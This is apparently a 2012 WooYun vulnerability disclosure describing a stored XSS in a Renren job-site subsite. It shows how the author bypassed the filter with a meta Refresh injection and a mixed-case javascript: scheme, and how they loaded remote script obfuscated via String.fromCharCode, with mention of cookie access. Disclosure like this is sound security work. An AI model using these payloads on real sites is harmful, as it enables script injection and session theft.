当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014825

漏洞标题:人人网某分站存储型XSS

相关厂商:人人网

漏洞作者: Drizzle.Risk

提交时间:2012-11-15 23:29

修复时间:2012-12-30 23:30

公开时间:2012-12-30 23:30

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-15: 细节已通知厂商并且等待厂商处理中
2012-11-16: 厂商已经确认,细节仅向厂商公开
2012-11-26: 细节向核心白帽子及相关领域专家公开
2012-12-06: 细节向普通白帽子公开
2012-12-16: 细节向实习白帽子公开
2012-12-30: 细节向公众公开

简要描述:

过滤不严导致XSS...

详细说明:

本来是去找工作的,谁知道顺便挖出来个XSS..-_-
开始先测试各种标签..发现过滤器基于白名单,input,img木有过滤...
然后发现<input type="submit" />会侧漏.. 过滤器弱爆了...

1.jpg


2.jpg


3.jpg


在这个地方测试了一些时间,发先不好利用,然后突然发现个好玩的东东..

4.jpg


测试中发现不能闭合,不过滤<和",但是过滤>

5.jpg


接着从Refresh入手...
观察观察

6.jpg


自己的content被和谐了...

7.jpg


想办法用他的content,分开写就OK了..

8.jpg


猥琐的过滤器,冒号被换成中文的了...
经过测试,在别的地方,冒号不会被替换...
目测是javascript的问题..

改为JAvAsCrIpT:


成功跨...过滤器弱爆了...

9成功跨.jpg


继续调用外部js,有字数限制..

11字数限制.jpg


目测支持JQuery..试试

//http://127.0.0.1/1.js
0;url=JAvAsCrIpT:jQuery.getScript(String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,49,46,106,115))" http-equiv="Refresh"


12远程JS.jpg


OK了... 顺便用JQ清空代码...

13顺便清空漏出的代码.jpg


哦对了,cookie:

cookie.jpg


Over

漏洞证明:

http://xiaozhao.renren.com/careerguide/edit
发帖然后改包..改成如下即可

0;url=JAvAsCrIpT:alert(Drizzle.Risk)" http-equiv="Refresh"


现在找工作都先问乌云ID.. 赶紧申请个...第一次发帖.. 写的详细点.. -_-

修复方案:

@人人网,你懂的..

版权声明:转载请注明来源 Drizzle.Risk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2012-11-16 09:56

厂商回复:

感谢!

最新状态:

暂无